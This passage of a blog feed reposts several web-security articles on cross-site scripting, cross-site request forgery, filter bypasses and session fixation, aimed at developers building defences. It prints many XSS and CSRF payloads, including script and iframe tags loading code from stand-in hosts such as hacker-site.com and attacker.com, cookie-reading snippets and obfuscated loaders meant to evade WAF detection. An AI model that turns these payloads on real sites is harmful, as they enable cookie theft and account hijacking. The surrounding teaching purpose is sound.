Typically, this is for forums, where users should only be allowed to enter basic HTML that does not affect other users, or blogs, where comments should only use basic HTML. This is certainly not trivial, and unless you are very experienced in avoiding XSS attacks, I suggest you leave well alone, and escape everything.</p><p>However, if you feel that you know enough to do this, then prepare to step into a minefield.</p><p>The basic idea is not to remove anything you think is dangerous, but to remove <em>everything</em> unless you know it is safe. The number of ways that scripts can be added to a document is quite staggering - some of these only work in certain browsers, but it only takes one of these to work in one browser for the exploit to be a success:</p><ul id="waystorun"><li>A script tag.</li><li>A script tag that has a namespace prefix in its tag name;<pre><code><div xmlns:foo="http://www.w3.org/1999/xhtml">
<foo:script>...script here...</foo:script>
</div></code></pre></li><li>Event handler attributes - these typically begin with 'on', and may have spaces before and after the '=' sign (and can also have a namespace prefix).</li><li>Link href (A, AREA or LINK elements, or XML processing instructions), base href, image src, input src, image usemap, form actions, input actions, xform submission actions, object data (or equivalent PARAMs such as url), object codebase, embed src, applet code, applet archive, applet codebase, iframe src, frame src, img longdesc, iframe longdesc, frame longdesc, blockquote cite, q cite, ins cite, del cite, meta refresh, meta link, body/table/th/td background, XLink URLs, DOCTYPE SYSTEM identifiers, ENTITY SYSTEM identifiers, and generally any attribute that accepts a URI value - all of which can have a 'javascript:' URL (or a 'vbscript:' URL in IE).</li><li>Any of those within a custom namespace.</li><li>Any attribute in Netscape 4 that uses JavaScript entities (or script macros) such as <code>align="&{...script...};"</code>.</li><li>Any of those elements (or a parent element) using xml:base with a 'javascript:' URL as its value.</li><li>CSS <code>url(javascript:...)</code> values (these can also be in imported or linked stylesheets).</li><li>CSS <code>@import "javascript:..."</code> (these can also be in imported or linked stylesheets).</li><li>CSS <var>-moz-binding</var> or <var>behavior</var> (these can also be in imported or linked stylesheets).</li><li>CSS <var>expression</var> (these can also be in imported or linked stylesheets).</li><li>HTML style attributes that use any of those CSS methods.</li><li>Iframes, frames, links, etc. 
with 'data:' URLs of pages containing scripts (currently these are treated by some browsers - but not all - as a script from another domain, but that is not a requirement, and browsers may change in future, since a same-domain response is expected and more useful).</li><li>Objects, embeds or applets that then run a script on the parent page (in most browsers this is allowed without any of the usual cross domain restrictions).</li><li>XML entities, which can contain any other scriptable content, and hide it behind a harmless-looking entity reference: <pre><code><!DOCTYPE foo [
<!ENTITY bar '<script xmlns="http://www.w3.org/1999/xhtml">...script here...</script>'>
]>
<foo>&bar;</foo></code></pre>These can also be defined in a remote file, which is loaded through a harmless-looking URL: <pre><code><!ENTITY bar SYSTEM "http://example.com/extra.xml"></code></pre> Or even indirectly via a custom DOCTYPE, which then contains the entity references: <pre><code><!DOCTYPE foo SYSTEM "http://example.com/untrusted.dtd"></code></pre></li><li>XSLT which creates scripts using any of the other points (XSLT itself can also be very damaging).</li><li>XBL which makes additional elements or attributes become scriptable.</li><li>XUL which contains script elements or scriptable attributes.</li><li>Conditional comments, which can then contain any other HTML, but appear to be only a comment.</li><li>Script within SVG images (or equivalent namespaced script elements).</li><li>XML events 'listener' elements or namespaced attributes.</li><li>VoiceXML and VoiceXML events.</li><li>XML processing instructions (like <code><xml-stylesheet href="javascript:..."></code>).</li></ul><p>There are certainly many other ways to put a script into a page, and that is why I call this a minefield. You absolutely must not blacklist elements or attributes you know are dangerous. You must whitelist those that you know are safe. Even seemingly safe elements such as LINK (or the related CSS <code>@import</code> rules) can end up importing a stylesheet from an untrusted source that contains the harmful content described above.</p><p>As well as whitelisting elements, you must also whitelist the attributes that each of them may have. Anything that is not on your whitelist must be removed, or deliberately altered so that it no longer functions as the element or attribute it is intended to be. PHP has a function that is supposed to help do this, called <var>strip_tags</var>. 
However, this copes very badly with invalid HTML, and it is possible to bypass it by feeding it specially broken HTML.</p><p>Stripping tags is a fine art, and can be exceptionally difficult, as you must be able to cope with intentionally broken HTML, designed so that after the tags have been stripped, what remains is another tag that was created by the removal of another one. An example would be this:</p><pre><code><<script>script>...evil script...<</script>/script></code></pre><p>Stripping them multiple times would be equally ineffective (unless a matching 'while' loop was used until the tags had been removed), as they could be nested to indefinite levels, but could end up with something that browsers understand.</p><p>Remember that "LiNk", "LINK" and "link" are all considered to be the same tag in HTML. In XHTML, namespaced elements can also be the same as non-namespaced ones. For the sake of simplicity, it is easiest to remove anything that is namespaced; if someone is trying to use a namespace in a forum post or blog comment, then they are probably trying to exploit something anyway.</p><p>Once tags have been stripped, attributes must also be stripped, to remove any attributes that are not considered safe, or required (the <var>HREF</var> attribute of a link and the <var>SRC</var> attribute of an image are not safe, but are usually needed anyway). If there is any chance that any of your users may still be using Netscape 4, then every attribute, even if normally safe, needs to be sanitised to remove JavaScript entities.</p><p>For removing tags and attributes, you may find it more effective to use a simple XML parser that only allows the non-namespaced tags and attributes you have decided to allow. 
Anything else can throw an error (make sure it does not attempt to display the rendered output in the error message, or you will be back where you started).</p><p>Finally, now that you have only the markup you want to allow, you must now ensure that unsafe attributes have their contents sanitized so that JavaScript URLs and data URIs are removed. This can be more difficult than it sounds.</p><p>Removing all instances of 'javascript:' will simply not be good enough. For a start, if the content initially contained something like this, removing instances of 'javascript:' will leave it with 'javascript:':</p><pre><code>jajavascript:vascjavascript:ript:</code></pre><p>A while loop would be able to take care of that, but there are several cases where browsers can be tricked into treating something as a 'javascript:' URL, even though it does not look like one. Some may work in only a few browsers, some will work in all of them. Examples would be these:</p><pre><code>ja<![CDATA[vasc]]>ript:
jav&#x09;ascript:
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;
url("java\scr\ipt:...")
u\r\00006C\000028"\00006A\00061\0076\061\73\63\72\69\70\74\3A...")</code></pre><p>The list of these is very extensive - some work in only selected browsers, but quite simply, if you intend to allow HTML, you must be able to recognise and disable <em>all</em> of them. See the <a href="http://ha.ckers.org/xss.html">XSS cheat sheet</a> for a fairly complete list. Note that some browsers also support other potentially dangerous protocols. IE also supports 'vbscript:', BrowseX also supports 'tcl:', Netscape 4 also supports 'mocha:' and 'livescript:' which are synonymous to 'javascript:', several Mac browsers support 'applescript:' (although supposedly that is safe), and no doubt there are other obscure browsers that support scripting in other languages with their own protocols, such as 'cpp:'. Many browsers support the 'data:' protocol, which in some of them will be treated as a file from the current domain, and can contain scripts. Mozilla browsers support the 'jar:' protocol, which can be used to unpack individual files from zip archives, jar archives, doc files, odt files, etc., and run them in the context of the site they are stored on (due to a bug, it also does not update the context if the URL triggers a redirect), which can be a major problem if you allow arbitrary files to be uploaded or otherwise attached to the Web site, such as with Web mail. It can even refer to a zip file contained in a 'data:' URL, meaning that it does not need to be uploaded, and can all be contained within the URL.</p><p>Future versions of major browsers may also support other potentially dangerous protocols. Remember that more ways to trick browsers into running scripts are discovered all the time, and you will need to keep your pages protected against them. An easy way to do this is to always insist that every URL a user provides must start with 'http:' or 'https:' (or 'ftp:', if you want to allow that). 
This is by far the best protection, as it ensures that only those safe protocols can be linked to, even if it may be slightly more inconvenient for the user to type. Other protocols you might want to consider safe are: 'mailto:', 'irc:', 'ircs:', 'gopher:', 'news:', 'nntp:', 'feed:', 'wap:', 'wtai:', 'about:', 'opera:', 'smsto:', 'mmsto:', 'tel:', 'fax:', 'ed2k:', 'dchub:', 'magnet:'. I do not recommend whitelisting streaming media protocols, for reasons given above and below. Be warned that with META refresh tags, some browsers allow multiple instances of the target URL, and any one could contain the scripted protocol.</p><p>Failing to cope with all of these possibilities could lead to a fully fledged attack being launched against your site. The <a href="http://namb.la/popular/tech.html">MySpace worm</a> is a good example of the lengths that you will need to go to, to protect yourself against these attacks.</p><h4 id="bbcode">Using <abbr title="Bulletin Board">BB</abbr> code</h4><p>BB code is like a simplistic version of HTML. There are several variations - wikis generally have their own syntax that serves a similar purpose. The general idea is that instead of using normal HTML, the user is allowed to enter only a small selection of HTML equivalents, that are then converted into the HTML they represent, with all other content escaped.</p><p>This makes it easier to work out what is or is not allowed - if it does not match the exact patterns, it is not converted. This can be less difficult than having to detect which parts to remove, as the parts of HTML that end up being used are generated by the server, and will not include anything that is considered dangerous.</p><p>However, this approach still does not cover 'javascript:' URLs (or other dangerous protocols) in permitted attributes, such as link href, and image src. 
These will still need to be taken care of, including all the possible variations, as described above.</p><h4 id="trust">Embedding content from other sites</h4><p>It is possible to use content, such as images or scripts, from other sites (a practice sometimes known as "hotlinking"), using an absolute URL:</p><pre><code><img src="http://othersite.com/someimage.jpg" alt="">
<script src="http://othersite.com/somescript.js" type="text/javascript"></script>
<iframe src="http://othersite.com/somepage.html"></iframe></code></pre><p>In some cases, such as images and iframes, scripting is not a problem, since the JavaScript security model will not allow scripts on pages from one domain to interact with pages on another. However, it is not always safe. If the other site decided to abuse this situation (perhaps in order to get back at your site for wasting their bandwidth by hotlinking), they could rewrite the script hotlinked by your site, to make it do something unexpected, with as much abusive power as cross site scripting. Even with pages in frames or iframes, they could display fake login forms, or inappropriate information convincing the user to give them sensitive information. Since the content appears to the user to be part of your site, they might trust it. It is important that you do not embed content from other sites unless you really trust them.</p><p>Plugins are also an extremely effective example. The plugin API allows plugin content to interact with scripts on the page (or create their own), without restriction. The plugin can be hosted on any domain, but if it is embedded on your page (using the <var>OBJECT</var> or <var>EMBED</var> elements, but not frames), it can run scripts as part of your page without being stopped by the JavaScript security model. This is different to other types of page content.</p><p>In the case of Flash, there is an optional <var>ALLOWSCRIPTING</var> parameter that can be set to <code>"never"</code> which will prevent the flash movie from communicating with JavaScript, but Flash is just one of many possible plugins, and others do not have an equivalent. Embedding plugin content from other sites, or allowing users to do so, basically opens your site up to cross site scripting attacks.</p><p>The same problem is true in reverse. 
If you produce plugin content, and that content has access to sensitive information, some other site may embed your content in their own page, and start interacting with it using scripts. If the information can be accessed through scripts, then it can be accessed by any page that embeds your plugin content. This is of particular importance to Flash-based shopping sites, or plugin-based security systems. The plugin itself may offer some form of protection (such as checking the hosting domain), but this is up to the individual plugin, and you should refer to that plugin's documentation for more information about protecting your content from remote scripting.</p><h3 id="xsrfprotect">Cross site request forgery</h3><p>XSRF attacks are based on knowing what the URL will look like, and knowing exactly what data the server expects to be passed, in order to perform an action, such as changing database data, or purchasing items.</p><pre><code>http://goodsite.com/delete.php?delete=all</code></pre><p>They also rely on the target site thinking that the user themself submitted the form, or requested the action from the site itself, and not another site.</p><p>Any solution must make it impossible for another site to do either of these.</p><p>XSRF attacks also rely on the user being logged in and visiting the exploiting page while the attack is carried out. These conditions require a certain amount of social engineering, and the success rate will also depend on timing. However, it only needs to be successful once for the effects to be extremely damaging. The solutions I will present are not exhaustive; you may also find others, but I recommend you use a combination of these approaches.</p><p>Some proposed solutions attempt to use multi-page forms to ensure the correct submission path is followed, and use POST instead of GET as the form method. Neither of these offers effective protection. Both make things a little harder for the attacker, but can fairly easily be circumvented. 
They can use a real form to get POST to work, and use timed submission in frames, iframes, or popups to simulate multi-page submission.</p><p>Although XSRF attacks are usually referred to with two separate sites being involved, this is not a requirement. Blogs and forums are very easy targets. For example, if you post an entry on your blog, and somebody comments, they can put HTML code in the comment that causes the blog post to be deleted as soon as you look through your comments.</p><pre><code><img src="http://blogsite.com/deletepost.php?id=23456"></code></pre><p>These attacks can also be carried out through BB code or wiki syntax, as long as an element is allowed that has a URL value. Considering <a href="http://www.howtocreate.co.uk/crosssite.html#waystorun">how many elements have URI values</a>, this is a fairly reliable attack. It also has the added benefit that users will usually be logged in while viewing comments on their own blog or forum. This particular type of attack can be partially protected against by insisting that forms that request actions use POST instead of GET, but as I have already said, POST is definitely not a complete solution to the XSRF problem.</p><h4 id="sessionurl">Encode a session ID in the URL</h4><p>This is a fairly simple way to make it virtually impossible for a malicious site to predict what the URL of the target page will be. Make sure that the session ID is sufficiently long and unpredictable, so that the site cannot simply try multiple combinations until one works. 20 random characters should usually be sufficient, but you may want to use more.</p><p>Unfortunately, this means that the site will need to generate <em>every</em> page to make sure that the session ID is used by every page, every link, every form (as a hidden input). 
It is not convenient, but it is very effective protection.</p><h4 id="referrer">Check referrers</h4><p>If a page containing a form or link is supposed to be the only page that can send data to a server-side processing script to request an action, then that processing page should check the referrer header to make sure that the page that requested the action was the correct page. Any requests from other pages (including if no referrer is sent, or if it is blank), should not cause any processing, and instead, should display a warning saying that the referrer header was not correct.</p><p>Note that some browsers can disable the referrer header if the user requests it - they should be asked to enable it again. Some browsers never send a referrer header. If you intend to use the referrer header as a security precaution, then these browsers will simply not be able to use the site. It is important not to allow requests that do not have a referrer, as an exploiting site could use a trick to prevent a browser sending the header, and this must not be mistaken for a browser that never sends one.</p><p>This on its own is <em>not</em> a complete solution for multi-user sites such as blogs, blog comments, or forums, as the attacker may be able to create forms or equivalent links on the page itself and convince you to click a button to initiate the action.</p><h4 id="pwdprompt">Prompting for passwords</h4><p>This is a very unpopular idea, but it is a very effective way of ensuring that the user is themself, and not a page that has posted form data as that user. The form that submits data to the processing page should also have a field where the user must enter their password (yes, even though they are already logged in). If the password is not correct, then the processing page must not process the data. 
Attacking pages will not know the user's password, so they will not be able to fake the form submission.</p><h4 id="idsubmission">Pass unique IDs in form submission</h4><p>Instead of having to encode a unique session ID in every page, include it in a hidden input in the form that submits to the processing page. This can be the same as the user's session ID that is held in a cookie. With XSRF attacks, the attacker does not know what the user's session ID is, so they will not be able to send that part of the form data. The processing page should then check for that session ID, and if it does not find it, it should reject the submission.</p><h3 id="securesites">Secure sites</h3><p>Many sites, such as shopping and banking, use encrypted connections to allow users to ensure that they are talking to the correct site, and to prevent attackers from sniffing network data packets. These require a whole new level of attack (as well as the XSS and XSRF attacks), but considering the amounts of money involved, these attacks are profitable enough to be done.</p><p>Encrypted connections do a lot more than just encrypting data sent by the user. They also encrypt pages sent <em>to</em> the user, and offer a certificate path that allows the user to ensure they are talking to the real site before they give it any sensitive information.</p><p>Typical attacks would involve intercepting and rewriting a page before the user receives it. This could be done through a compromised router, for example. Another would be to use a compromised DNS server to point the user to the wrong server that pretends to be the real site - the user's address bar will of course show the correct site, and it could even be encrypted. Strictly speaking, these are not cross site scripting attacks, but the effects are the same; some content of the page is changed by a third party, so that sensitive information can be sent to them instead.</p><p>Secure connections can deal with both of these situations. 
Firstly, an encrypted connection can be intercepted, but the attacker cannot read or rewrite the page content, unless they can break the encryption fast enough. This is why it is important to use high level (typically 128 bit) encryption, as it is not currently possible to break within the lifespan of the attacker. Some of the lower level older encryptions (56 bit) can be broken within just a few seconds.</p><p>Encrypted connections also offer the ability to check the certification path. This is also virtually impossible to fake, so a user can check the certificate to make sure it is the right company. The browser can check the certification path to ensure the certificates are valid, and that the certification path is correct. Any failures will cause a browser to display warnings to the user so they are aware that the site may not be who it claims to be.</p><p>The first and one of the biggest mistakes a site can make is to use both secure and insecure content on the same page. An attacker only needs to compromise one file in order to carry out a successful attack. If they compromise the insecure content (such as replacing a safe script file with an unsafe one), the secure content is compromised as well. This mix of content security happens on quite a few sites, and browsers usually display warnings, but are moving towards denying it altogether.</p><p>The next most stupid mistake is to have the login form on an insecure page, that posts the login information to the secure page. It assumes that since the data is encrypted when it is sent, that everything is OK. This happens on a disturbingly high number of bank sites, especially those in the USA.</p><p>The problem with this approach is that the user should be able to check the site is real <strong>before</strong> they give it their information. If the DNS has been compromised, they would only find that out <em>after</em> they have sent their login details to the wrong site. 
If the page has been altered by a compromised router, for example, to change the action of the form, the user would not know about it until after they sent their data to the wrong site (or if it then sent them to the real site, they would never know).</p><p>Very occasionally, there is the problem that an encrypted site sends data - via forms, XMLHttpRequest, or any other means - to an insecure page, either directly or via a redirect. Packet sniffing and rewriting means that an attacker has immediate access to that information.</p><p>Secure sites need to ensure that they do not make any of these mistakes, as well as not allowing XSS and XSRF attacks.</p>Cross Site Scripting Attack openkr https://youngsam.net/entry/Cross-Site-Scripting-Attack 2011-09-14T02:15:39+09:00 2011-09-14T02:15:39+09:00<h1><font size="2">Material on Cross Site Scripting hacking. There is also a free test version.<br></font><br>Cross Site Scripting Attack</h1><strong>What is Cross Site Scripting?</strong><br><p>Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records.</p><p>Cross Site Scripting (also known as <a href="http://www.acunetix.com/websitesecurity/xss.htm">XSS</a> or CSS) is generally believed to be one of the most common application layer hacking techniques.</p><p>The pie-chart below, created by the Web Hacking Incident Database for 2011 (WHID), clearly shows that whilst many different attack methods exist, SQL injection and XSS are the most popular. 
To add to this, many other attack methods, such as Information Disclosures, Content Spoofing and Stolen Credentials, could all be side-effects of an XSS attack.</p><p align="center"><img border="0" alt="Top Web Attack Methods from the Web Hacking Incident Database WHID" src="http://www.acunetix.com/general/images/websitesecurity/WHID_top_web_hacking_methods.png" width="568" height="317"></p><p><strong>In general, cross-site scripting refers to the hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim.</strong></p><p>Today, websites rely heavily on complex web applications to deliver different output or content to a wide variety of users according to set preferences and specific needs. This arms organizations with the ability to provide better value to their customers and prospects. However, dynamic websites suffer from serious vulnerabilities rendering organizations helpless and prone to cross site scripting attacks on their data.</p><p>"A web page contains both text and HTML markup that is generated by the server and interpreted by the client browser. Web sites that generate only static pages are able to have full control over how the browser interprets these pages. Web sites that generate dynamic pages do not have complete control over how their outputs are interpreted by the client. The heart of the issue is that if mistrusted content can be introduced into a dynamic page, neither the web site nor the client has enough information to recognize that this has happened and take protective actions." (CERT Coordination Center).</p><p>Cross Site Scripting allows an attacker to embed malicious <a href="http://www.acunetix.com/websitesecurity/javascript.htm">JavaScript</a>, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. 
The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and is distributed over any possible means on the internet.</p><p>As a hacking tool, the attacker can formulate and distribute a custom-crafted CSS URL just by using a browser to test the dynamic website response. The attacker also needs to know some HTML, JavaScript and a dynamic language, to produce a URL which is not too suspicious-looking, in order to attack an XSS-vulnerable website.</p><p>Any web page which passes parameters to a database can be vulnerable to this hacking technique. Usually these are present in Login forms, Forgot Password forms, etc…</p><p>N.B. Often people refer to Cross Site Scripting as CSS or XSS, which can be confused with Cascading Style Sheets (CSS).</p><strong>The Theory of XSS</strong><br><p>In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script. When a user visits this web page the script is downloaded to his browser and executed. There are many slight variations to this theme; however, all XSS attacks follow this pattern, which is depicted in the diagram below.</p><p align="center"><img border="0" alt="A high level view of a typical XSS attack" src="http://www.acunetix.com/general/images/websitesecurity/xssattack.png" width="568" height="317"></p><p>As a web developer you are putting measures in place to secure the first step of the attack. You want to prevent the hacker from infecting your innocent web page with his malicious script. 
There are various ways to do that, and this article goes into some technical detail on the most important techniques that you must use to disable this sort of attack against your users.</p><strong>XSS Attack Vectors</strong><br><p>So how does a hacker infect your web page in the first place? You might think that for an attacker to make changes to your web page he must first break the security of the web server and be able to upload and modify files on that server. Unfortunately for you, an XSS attack is much easier than that.</p><p>Internet applications today are not static HTML pages. They are dynamic and filled with ever changing content. Modern web pages pull data from many different sources. This data is amalgamated with your own web page and can contain simple text, or images, and can also contain HTML tags such as <p> for paragraph, <img> for image and <script> for scripts. Many times the hacker will use the ‘comments’ feature of your web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behaviour. Something as simple as a Facebook post on your wall can contain a malicious script, which if not filtered by the Facebook servers will be injected into your Wall and execute on the browser of every person who visits your Facebook profile.</p><p>By now you should be aware that any sort of data that can land on your web page from an external source has the potential of being infected with a malicious script, but in what form does the data come?</p><p><strong><SCRIPT></strong></p><p>The <SCRIPT> tag is the most popular way and sometimes easiest to detect. 
It can arrive on your page in the following forms:</p><p>External script:</p><p><code><SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT></code></p><p>Embedded script:</p><p><code><SCRIPT> alert("XSS"); </SCRIPT></code></p><p><strong><BODY></strong></p><p>The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below:</p><p><code><BODY ONLOAD=alert("XSS")></code></p><p>The BACKGROUND attribute can be similarly exploited:</p><p><code><BODY BACKGROUND="javascript:alert('XSS')"></code></p><p><strong><IMG></strong></p><p>Some browsers will execute a script when found in the <IMG> tag as shown here:</p><p><code><IMG SRC="javascript:alert('XSS');"></code></p><p>There are some variations of this that work in some browsers:</p><p><code><IMG DYNSRC="javascript:alert('XSS')"></code><br><code><IMG LOWSRC="javascript:alert('XSS')"></code></p><p><strong><IFRAME></strong></p><p>The <IFRAME> tag allows you to import HTML into a page. This imported HTML can contain a script.</p><p><code><IFRAME SRC="http://hacker-site.com/xss.html"></code></p><p><strong><INPUT></strong></p><p>If the TYPE attribute of the <INPUT> tag is set to "IMAGE", it can be manipulated to embed a script:</p><p><code><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"></code></p><p><strong><LINK></strong></p><p>The <LINK> tag, which is often used to link to external style sheets, could contain a script:</p><p><code><LINK REL="stylesheet" HREF="javascript:alert('XSS');"></code></p><p><strong><TABLE></strong></p><p>The BACKGROUND attribute of the TABLE tag can be exploited to refer to a script instead of an image:</p><p><code><TABLE BACKGROUND="javascript:alert('XSS')"></code></p><p>The same applies to the <TD> tag, used to separate cells inside a table:</p><p><code><TD BACKGROUND="javascript:alert('XSS')"></code></p><p><strong><DIV></strong></p><p>The <DIV> tag, similar to the <TABLE> and <TD> tags, can also specify a background and therefore embed a script:</p><p><code><DIV 
STYLE="background-image: url(javascript:alert('XSS'))"></code></p><p>The <DIV> STYLE attribute can also be manipulated in the following way:</p><p><code><DIV STYLE="width: expression(alert('XSS'));"></code></p><p><strong><OBJECT></strong></p><p>The <OBJECT> tag can be used to pull in a script from an external site in the following way:</p><p><code><OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"></code></p><p><strong><EMBED></strong></p><p>If the hacker places a malicious script inside a flash file, it can be injected in the following way:</p><p><code><EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"></code></p><strong>Is your site vulnerable to Cross Site Scripting?</strong><br><p>Our experience leads us to conclude that the cross-site scripting vulnerability is one of the most widespread flaws on the Internet and will occur anywhere a web application uses input from a user in the output it generates without validating it. Our own research shows that over a third of the organizations applying for our free audit service are vulnerable to Cross Site Scripting. And the trend is upward.</p><strong>Example of a Cross Site Scripting Attack</strong><br><p>As a simple example, imagine a search engine site which is open to an XSS attack. The query screen of the search engine is a simple single field form with a submit button. The results page displays both the matched results and the text you are looking for.</p><p>Search Results for "XSS Vulnerability"</p><p>To be able to bookmark pages, search engines generally leave the entered variables in the URL address. 
In this case the URL would look like:</p><p>http://test.searchengine.com/search.php?q=XSS%20Vulnerability</p><p>Next we try to send the following query to the search engine:</p><p><script type="text/javascript"> alert ('This is an XSS Vulnerability')</script></p><p>By submitting the query to search.php, it is encoded and the resulting URL would be something like:</p><p>http://test.searchengine.com/search.php?q=%3Cscript%3Ealert%28%91This%20is%20an%20XSS%20Vulnerability%92%29%3C%2Fscript%3E</p><p>Upon loading the results page, the test search engine would probably display no results for the search but it will display a JavaScript alert which was injected into the page by using the XSS vulnerability.</p><strong>How to Check for Cross Site Scripting Vulnerabilities</strong><br><p>To check for Cross site scripting vulnerabilities, use a Web Vulnerability Scanner. A Web Vulnerability Scanner crawls your entire website and automatically checks for Cross Site Scripting vulnerabilities. It will indicate which URLs/scripts are vulnerable to these attacks so that you can fix the vulnerability easily. Besides Cross site scripting vulnerabilities a web application scanner will also check for <a href="http://www.acunetix.com/websitesecurity/sql-injection.htm">SQL injection</a> & other web vulnerabilities.</p><p><a href="http://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a> scans for <a href="http://www.acunetix.com/websitesecurity/sql-injection.htm">SQL injection</a>, Cross site scripting, <a href="http://www.acunetix.com/websitesecurity/google-hacking.htm">Google hacking</a> and many more vulnerabilities.</p><strong>Preventing Cross Site Scripting Attacks</strong><br><p>The purpose of this article is to define Cross Site Scripting attacks and give some practical examples. Preventing XSS attacks requires diligence on the part of the programmers and the necessary security testing. 
You can <a href="http://www.acunetix.com/blog/web-security-zone/articles/preventing-xss-attacks/" target="_blank">learn more about preventing cross-site scripting attacks here.</a></p><p><strong>Scanning for XSS Vulnerabilities with Acunetix Web Vulnerability Scanner Free Edition!</strong><br>To check whether your website has cross site scripting vulnerabilities, download the Free Edition from <a href="http://www.acunetix.com/cross-site-scripting/scanner.htm">http://www.acunetix.com/cross-site-scripting/scanner.htm</a>. This version will scan any website / web application for <a href="http://www.acunetix.com/websitesecurity/xss.htm">XSS</a> vulnerabilities and it will also reveal all the essential information related to it, such as the vulnerability location and remediation techniques. Scanning for XSS is normally a quick exercise (depending on the size of the web-site).</p>Example of a session fixation vulnerability openkr https://youngsam.net/entry/%EC%84%B8%EC%85%98-%EA%B3%A0%EC%A0%95-%EC%B7%A8%EC%95%BD%EC%84%B1%EC%9D%98-%EC%98%88 2011-09-14T02:02:11+09:00 2011-09-14T02:02:11+09:00<pre><code>private boolean authenticateUser(HttpServletRequest req)
{
    // session.invalidate() should have been called prior to this
    // to invalidate an existing session

    HttpSession session = req.getSession(false);
    if (null != session)
    {
        // existing session assumed valid
        return true;
    }

    if (authenticateRequest(req) == true)
    {
        // create a new session
        req.getSession();
        return true;
    }

    return false;
}</code></pre>XSS (Cross Site Scripting) - Cross Site Scripting openkr https://youngsam.net/entry/XSSCross-Site-Scripting-%ED%81%AC%EB%A1%9C%EC%8A%A4-%EC%82%AC%EC%9D%B4%ED%8A%B8-%EC%8A%A4%ED%81%AC%EB%A6%BD%ED%8C%85 2011-09-14T01:56:54+09:00 2011-09-14T01:40:01+09:00<span style="color: rgb(153, 0, 0);">While searching for XSS for the first time in a while, I found a well-organized site, so I am saving a summary of it here.<br></span><br><blockquote>Cross-site scripting is a very dangerous security exposure that must be considered when designing a secure web-based application. This article explains the nature of the exposure and how it affects you, and introduces solution strategies. </blockquote>
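<p>Most web sites today add dynamic content to their pages to give users a more enjoyable experience. Dynamic content is content generated by some server process, and it behaves and displays differently depending on settings and needs. Dynamic web sites also carry a risk that static web sites do not. This is called "cross-site scripting", also known as "XSS". </p>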
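<p>"A Web page consists of text and HTML markup. These are generated by the server and interpreted by the client browser. Web sites that generate only static
pages have full control over how the browser user interprets those pages. Web sites that generate dynamic pages
do not have complete control over how the client interprets their output. The heart of the issue is that untrusted content can be introduced into a dynamic Web page.
Neither the Web site nor the client has enough information to recognize this and defend against it," explains the
CERT Coordination Center, which studies Internet security vulnerabilities. </p>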
<p>Cross-site scripting is already well known among attackers. Every month, cross-site scripting attacks occur on commercial sites and
advisories explaining the risk are published. If you are not careful, your Web site or company may also fall victim to such an attack. <br>XSS (Cross Site Scripting) is not a typical hacking method that attacks the services of a server; it is a technique that attacks the users of that server. For example, the moment a user of the service clicks to read a post, a script attached to the post runs, and through that script malicious code is planted on the user.<br><br>Because it plays on users' curiosity to get them to open posts, mail, pictures and the like, it is classified as a social-engineering hacking technique.<br><br>Once an application on a Web site is known to be vulnerable to cross-site scripting, an attacker formulates an attack. The technique attackers use most often is
to inject JavaScript, VBScript, ActiveX, HTML, or
Flash so that it executes on the target's system with the target's privileges. Once the attack is active, account hijacking, changing of user settings, cookie theft and poisoning, false advertising and so on become possible. <br><br><br>
<strong>1. XSS Test</strong><br><br>If you enter <script>alert("XSS")</script> into an ordinary bulletin board and a message box saying XSS appears, the board has an XSS vulnerability.<br><br>Example 1) Obtaining the user's cookie value<br><script>alert(document.cookie);</script><br><br>Example 2) Redirecting to a site that hosts malicious code on click<br><a href="http://test.com/test.cgi?loc=<script src='http://attacker.com/test'></script>">Click</a><br><br>
<strong>2. iframe tag</strong><br><br>Example 1) Redirecting to a malicious-code site using a hidden iframe<br><iframe src=" <a href="http://attack.com/"><font color="#ec5600">http://attack.com</font></a>" width="0" height="0" frameborder="0"></iframe><br><br>
<strong>3. object tag</strong><br><br>Example 1) Redirects to a malicious-code site when the specified file does not exist.<br><object width=0 height=0 sytle=display:none; type=text/xscriptlet data=mk:@MSITStore:mhtml:c:\nosuchfile.mht! http://test.com/attack_chm::exploit.html></object><br><br>
<strong>4. div technique<br></strong><br>Example 1) A div tag is used to insert an image or similar content.<br><div style="position:absolute; left:200; top:90; z-index:2;"><br> <img src="images/test.jpg"><br></div><br><br>
<strong>5. Encoding technique<br></strong><br>Example 1) The attack string is encoded into a different representation so that it is less noticeable, or so that it bypasses the detection patterns of an IPS, web application firewall and the like.<br><br>Original: <script>alert("test");</script><br>Encoded: <script>alert(String.fromCharCode(116, 101, 115, 116))</script><br><br>
<strong>6. Obfuscation technique<br></strong><br>Example 1) Used for bypassing detection, like the encoding technique.<br><script language="javascript"><br> e = '0x00' + '5F';<br> str1 = "%E4%BC%B7%AA%C0%AD ....... %AA%E2";<br> str = tmp = '';<br><br> for(i=0; i<str1.length; i+=3)<br> { <br> tmp = unescape(str1.slice(i,i+3));<br> str = str + String.fromCharCode((tmp.charCodeAt(0)^e)-127);<br> }<br><br> document.write(str); <br></script><br><br>
<strong>7. Other bypass methods</strong> <span style="color: rgb(153, 0, 0);">(I don't quite understand this method)<br></span><br>;</script><script>alert("xss");</scr..</p><p><a name="N1021F"><span class="atitle"><font size="4">Summary</font></span></a></p><p>This article explained how attackers use cross-site scripting to attack Web sites. It also explained that a Web site can reduce such attacks simply by using a custom tag library
to encode dynamic content. You can use the <code><font size="2">XSS</font></code> custom tag
library as is, or modify it to fit your own Web application. <br><br>Related information: <a href="http://ha.ckers.org/xss.html#XSScalc">http://ha.ckers.org/xss.html#XSScalc</a></p>
